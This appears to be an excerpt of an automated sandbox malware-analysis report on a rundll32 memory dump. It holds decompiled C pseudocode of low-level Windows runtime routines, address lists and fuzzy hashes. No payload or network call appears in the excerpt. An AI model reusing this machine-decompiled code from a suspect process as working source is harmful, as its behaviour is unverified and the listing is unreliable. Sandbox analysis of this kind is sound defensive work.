                                                                                                                0x00000000
                                                                                                                0x04477b00
                                                                                                                0x04477b03
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477b05
                                                                                                                0x04477b09
                                                                                                                0x04477b0d
                                                                                                                0x04477b0f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477b18
                                                                                                                0x04477b1d
                                                                                                                0x00000000
                                                                                                                0x04477b1d
                                                                                                                0x04477ab7
                                                                                                                0x04477ab9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477abf
                                                                                                                0x04477ac1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477ac3
                                                                                                                0x04477ac6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477ac8
                                                                                                                0x04477acc
                                                                                                                0x04477ad0
                                                                                                                0x04477ad2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477adb
                                                                                                                0x00000000
                                                                                                                0x04477adb
                                                                                                                0x044779d6
                                                                                                                0x044779d9
                                                                                                                0x044779dc
                                                                                                                0x04477a91
                                                                                                                0x04477a94
                                                                                                                0x00000000
                                                                                                                0x04477a94
                                                                                                                0x044779e2
                                                                                                                0x00000000
                                                                                                                0x044779e2
                                                                                                                0x04477a74
                                                                                                                0x04477a7a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477a8a
                                                                                                                0x04477a21
                                                                                                                0x04477a21
                                                                                                                0x00000000
                                                                                                                0x04477a21
                                                                                                                0x0440c650
                                                                                                                0x0440c651
                                                                                                                0x0440c656
                                                                                                                0x0440c65c
                                                                                                                0x0440c65d
                                                                                                                0x0440c663
                                                                                                                0x0440c664
                                                                                                                0x0440c66a
                                                                                                                0x0440c66e
                                                                                                                0x044779c5
                                                                                                                0x044779c7
                                                                                                                0x00000000
                                                                                                                0x044779c7
                                                                                                                0x0440c67a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: acfe260a6783ecee89a3e3dc34614e619e067a6748d616dc02f14285b0866621
                                                                                                                • Instruction ID: 55c7411138995b2c4157329c3b675893e1aab20d168423f2a510773f99dd4fed
                                                                                                                • Opcode Fuzzy Hash: acfe260a6783ecee89a3e3dc34614e619e067a6748d616dc02f14285b0866621
                                                                                                                • Instruction Fuzzy Hash: 2A818FB66042019FEF25CE24C881ABB73A5EB84358F54496FED459B341E730FD46CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04486DC9 Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E04486DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04486B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04427D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04449AE0();
					_t87 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0448795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0448795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0448795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0448795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04424620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04486B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04486B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04486B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04486B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04427D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04449AE0();
								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04422400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04422400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04422400( &_v52);
							}
							if(_v28 >= 0) {
								return L04422400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                0x04486dd4
                                                                                                                0x04486dde
                                                                                                                0x04486de1
                                                                                                                0x04486de3
                                                                                                                0x04486de6
                                                                                                                0x04486de9
                                                                                                                0x04486dec
                                                                                                                0x04486def
                                                                                                                0x04486df2
                                                                                                                0x04486df5
                                                                                                                0x04486dfe
                                                                                                                0x04486e04
                                                                                                                0x04486e09
                                                                                                                0x04486e0d
                                                                                                                0x04486e18
                                                                                                                0x04486e1b
                                                                                                                0x04486e22
                                                                                                                0x04486e2d
                                                                                                                0x04486e30
                                                                                                                0x04486e36
                                                                                                                0x04486e42
                                                                                                                0x04486e4d
                                                                                                                0x04486e50
                                                                                                                0x04486e55
                                                                                                                0x04486e5c
                                                                                                                0x04486e6e
                                                                                                                0x04486e5e
                                                                                                                0x04486e67
                                                                                                                0x04486e67
                                                                                                                0x04486e73
                                                                                                                0x04486e74
                                                                                                                0x04486e77
                                                                                                                0x04486e7c
                                                                                                                0x04486e7d
                                                                                                                0x04486e8e
                                                                                                                0x04486e93
                                                                                                                0x04486e9c
                                                                                                                0x04486ea8
                                                                                                                0x04486eab
                                                                                                                0x04486eac
                                                                                                                0x04486eb3
                                                                                                                0x04486ecd
                                                                                                                0x04486edc
                                                                                                                0x04486ee2
                                                                                                                0x04486ee5
                                                                                                                0x04486ef2
                                                                                                                0x04486efb
                                                                                                                0x04486f01
                                                                                                                0x04486f06
                                                                                                                0x04486f0b
                                                                                                                0x04486f11
                                                                                                                0x04486f1a
                                                                                                                0x04486f22
                                                                                                                0x04486f26
                                                                                                                0x04486f26
                                                                                                                0x04486f33
                                                                                                                0x04486f41
                                                                                                                0x04486f44
                                                                                                                0x04486f47
                                                                                                                0x04486f54
                                                                                                                0x04486f65
                                                                                                                0x04486f77
                                                                                                                0x04486f7c
                                                                                                                0x04486f82
                                                                                                                0x04486f91
                                                                                                                0x04486f99
                                                                                                                0x04486fa3
                                                                                                                0x04486fae
                                                                                                                0x04486fae
                                                                                                                0x04486fba
                                                                                                                0x04486fbb
                                                                                                                0x04486fbc
                                                                                                                0x04486fc1
                                                                                                                0x04486fc2
                                                                                                                0x04486fd3
                                                                                                                0x04486fd8
                                                                                                                0x04486fd8
                                                                                                                0x04486fdf
                                                                                                                0x04486fe8
                                                                                                                0x04486fee
                                                                                                                0x04486fee
                                                                                                                0x04486ff5
                                                                                                                0x04486ffb
                                                                                                                0x04486ffb
                                                                                                                0x04487004
                                                                                                                0x00000000
                                                                                                                0x0448700a
                                                                                                                0x04487004
                                                                                                                0x04486eb3
                                                                                                                0x04486e9c
                                                                                                                0x04487015

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction ID: 11a9f8b90bbabc505509e8f9bd63c66a6f4f5c54e332fb8368f2047f15ec4640
                                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction Fuzzy Hash: F2715F71A00619AFDF10EFA5C944AAEBBB9FF48714F10406EE505A7251DB34FA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0449B8D0 Relevance: .2, Instructions: 199COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0449B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x44f7b9c; // 0x0
				_t124 = L04424620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04449800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E044495B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E044495D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L044277F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04449910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E044495D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x44f7b9c; // 0x0
									_t92 = L04424620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04449910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0440A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0449E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0449E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E044495B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                0x0449b8d9
                                                                                                                0x0449b8e4
                                                                                                                0x00000000
                                                                                                                0x0449b8e6
                                                                                                                0x0449b8f3
                                                                                                                0x0449b8f5
                                                                                                                0x0449b8f5
                                                                                                                0x0449b8f8
                                                                                                                0x0449b920
                                                                                                                0x0449b924
                                                                                                                0x0449b936
                                                                                                                0x0449b939
                                                                                                                0x0449b93d
                                                                                                                0x0449b948
                                                                                                                0x0449b9a0
                                                                                                                0x0449b9a0
                                                                                                                0x0449b9a4
                                                                                                                0x0449b9bf
                                                                                                                0x0449b9c4
                                                                                                                0x0449b9c6
                                                                                                                0x0449b9cd
                                                                                                                0x0449b9d1
                                                                                                                0x0449bad4
                                                                                                                0x0449bad8
                                                                                                                0x0449bada
                                                                                                                0x0449badc
                                                                                                                0x0449badc
                                                                                                                0x0449badf
                                                                                                                0x0449bae0
                                                                                                                0x0449bae2
                                                                                                                0x0449bae4
                                                                                                                0x0449baec
                                                                                                                0x0449baee
                                                                                                                0x0449baf0
                                                                                                                0x0449baf0
                                                                                                                0x0449baec
                                                                                                                0x0449bafb
                                                                                                                0x0449bafc
                                                                                                                0x0449bafe
                                                                                                                0x0449bb01
                                                                                                                0x0449bb01
                                                                                                                0x00000000
                                                                                                                0x0449bb06
                                                                                                                0x0449b9d7
                                                                                                                0x0449b9db
                                                                                                                0x0449b9db
                                                                                                                0x0449b9de
                                                                                                                0x0449b9de
                                                                                                                0x0449b9e4
                                                                                                                0x0449b9e7
                                                                                                                0x0449b9ea
                                                                                                                0x0449b9ec
                                                                                                                0x0449b9ef
                                                                                                                0x0449b9f3
                                                                                                                0x0449ba1b
                                                                                                                0x0449ba1b
                                                                                                                0x0449ba23
                                                                                                                0x0449ba24
                                                                                                                0x0449ba27
                                                                                                                0x0449ba2a
                                                                                                                0x0449ba2b
                                                                                                                0x0449ba2e
                                                                                                                0x0449ba30
                                                                                                                0x0449ba37
                                                                                                                0x0449ba3f
                                                                                                                0x0449ba9c
                                                                                                                0x0449baa2
                                                                                                                0x0449bb13
                                                                                                                0x0449bb15
                                                                                                                0x0449baae
                                                                                                                0x0449baae
                                                                                                                0x0449bab3
                                                                                                                0x0449bab5
                                                                                                                0x0449baba
                                                                                                                0x0449bac8
                                                                                                                0x0449bac8
                                                                                                                0x0449baba
                                                                                                                0x0449bacd
                                                                                                                0x0449bacf
                                                                                                                0x00000000
                                                                                                                0x0449bacf
                                                                                                                0x0449bb1a
                                                                                                                0x00000000
                                                                                                                0x0449bb1c
                                                                                                                0x0449baa7
                                                                                                                0x0449bb11
                                                                                                                0x00000000
                                                                                                                0x0449bb11
                                                                                                                0x0449baa9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0449ba41
                                                                                                                0x0449ba41
                                                                                                                0x0449ba41
                                                                                                                0x0449ba58
                                                                                                                0x0449ba5d
                                                                                                                0x0449ba62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0449ba64
                                                                                                                0x0449ba67
                                                                                                                0x0449ba68
                                                                                                                0x0449ba69
                                                                                                                0x0449ba6c
                                                                                                                0x0449ba6f
                                                                                                                0x0449ba71
                                                                                                                0x0449ba78
                                                                                                                0x0449ba80
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0449ba90
                                                                                                                0x0449ba90
                                                                                                                0x0449ba97
                                                                                                                0x00000000
                                                                                                                0x0449ba97
                                                                                                                0x0449b9f5
                                                                                                                0x0449b9f7
                                                                                                                0x0449b9f7
                                                                                                                0x0449b9fa
                                                                                                                0x0449ba03
                                                                                                                0x0449ba07
                                                                                                                0x0449ba0c
                                                                                                                0x0449ba10
                                                                                                                0x0449ba17
                                                                                                                0x00000000
                                                                                                                0x0449b9f7
                                                                                                                0x0449b9a6
                                                                                                                0x0449b9a8
                                                                                                                0x0449b9af
                                                                                                                0x0449b9b3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0449b9b9
                                                                                                                0x00000000
                                                                                                                0x0449b9b9
                                                                                                                0x0449b94d
                                                                                                                0x0449b98f
                                                                                                                0x0449b995
                                                                                                                0x0449b999
                                                                                                                0x0449b960
                                                                                                                0x0449b967
                                                                                                                0x0449b968
                                                                                                                0x0449b96a
                                                                                                                0x00000000
                                                                                                                0x0449b96a
                                                                                                                0x0449b99b
                                                                                                                0x0449b99e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0449b99e
                                                                                                                0x0449b951
                                                                                                                0x0449b954
                                                                                                                0x0449b95a
                                                                                                                0x0449b95e
                                                                                                                0x0449b972
                                                                                                                0x0449b979
                                                                                                                0x0449b97d
                                                                                                                0x0449b97f
                                                                                                                0x0449b980
                                                                                                                0x0449b982
                                                                                                                0x0449b984
                                                                                                                0x00000000
                                                                                                                0x0449b984
                                                                                                                0x00000000
                                                                                                                0x0449b926
                                                                                                                0x00000000
                                                                                                                0x0449b926

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a49bd7ba39e88fe0376eaeff9fce3b74b7aff60fe869dcec6c8f30ab831f2f9
                                                                                                                • Instruction ID: a9640a681d340f469597f6cd6bd0dc6da37c540e9aaa74df2b18876d371dc952
                                                                                                                • Opcode Fuzzy Hash: 3a49bd7ba39e88fe0376eaeff9fce3b74b7aff60fe869dcec6c8f30ab831f2f9
                                                                                                                • Instruction Fuzzy Hash: BE71DC32200A41AFEF31CE25D844B56BBE5FB80724F14452EE6558B6A2DB74FD41EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044052A5 Relevance: .2, Instructions: 161COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E044052A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0441EEF0(0x44f79a0);
					_t104 =  *0x44f8210; // 0x352bb8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0441EB70(_t93, 0x44f79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04449890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0441EEF0(0x44f79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0441EB70(0, 0x44f79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x352bd002
								_t13 = _t104 + 0xc; // 0x352bc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0443F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0441EEF0(0x44f79a0);
									__eflags =  *0x44f8210 - _t104; // 0x352bb8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x44f8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2000352b
											_t95 =  *((intOrPtr*)( *_t37));
											E04484888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0441EB70(_t95, 0x44f79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E044495D0();
											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E044495D0();
											L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0441EB70(_t93, 0x44f79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E044495D0();
										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E044495D0();
										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2000352b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0x352bd002
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0443F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                0x044052a5
                                                                                                                0x044052ad
                                                                                                                0x044052b0
                                                                                                                0x044052b3
                                                                                                                0x044052b7
                                                                                                                0x044052ba
                                                                                                                0x044052bf
                                                                                                                0x044052c4
                                                                                                                0x044052cc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044052ce
                                                                                                                0x044052d1
                                                                                                                0x044052d9
                                                                                                                0x044052dd
                                                                                                                0x044052e7
                                                                                                                0x044052f7
                                                                                                                0x044052f9
                                                                                                                0x044052fd
                                                                                                                0x04460dcf
                                                                                                                0x04460dd5
                                                                                                                0x04460dd6
                                                                                                                0x04460dd7
                                                                                                                0x04460dd8
                                                                                                                0x04460dd9
                                                                                                                0x04460dde
                                                                                                                0x04460ddf
                                                                                                                0x04460de0
                                                                                                                0x04460de1
                                                                                                                0x04460de2
                                                                                                                0x04460de2
                                                                                                                0x04460de5
                                                                                                                0x04460dea
                                                                                                                0x04460dec
                                                                                                                0x04460f60
                                                                                                                0x04460f64
                                                                                                                0x04460f70
                                                                                                                0x04460f76
                                                                                                                0x04460f79
                                                                                                                0x04460f79
                                                                                                                0x00000000
                                                                                                                0x04460f64
                                                                                                                0x04460df2
                                                                                                                0x04460df7
                                                                                                                0x04460e04
                                                                                                                0x04460e04
                                                                                                                0x04460e0d
                                                                                                                0x04460e0d
                                                                                                                0x04460e10
                                                                                                                0x04460e1a
                                                                                                                0x04460e1c
                                                                                                                0x04460e4c
                                                                                                                0x04460e52
                                                                                                                0x04460e61
                                                                                                                0x04460e67
                                                                                                                0x04460e6b
                                                                                                                0x04460e70
                                                                                                                0x04460e76
                                                                                                                0x04460ed7
                                                                                                                0x04460edc
                                                                                                                0x04460ee0
                                                                                                                0x04460ee6
                                                                                                                0x04460eea
                                                                                                                0x04460eed
                                                                                                                0x04460ef0
                                                                                                                0x04460ef3
                                                                                                                0x04460ef6
                                                                                                                0x04460ef9
                                                                                                                0x04460efb
                                                                                                                0x04460efe
                                                                                                                0x04460f01
                                                                                                                0x04460f01
                                                                                                                0x04460f0b
                                                                                                                0x04460f12
                                                                                                                0x04460f16
                                                                                                                0x04460f18
                                                                                                                0x04460f18
                                                                                                                0x04460f1b
                                                                                                                0x04460f2c
                                                                                                                0x04460f31
                                                                                                                0x04460f31
                                                                                                                0x04460f35
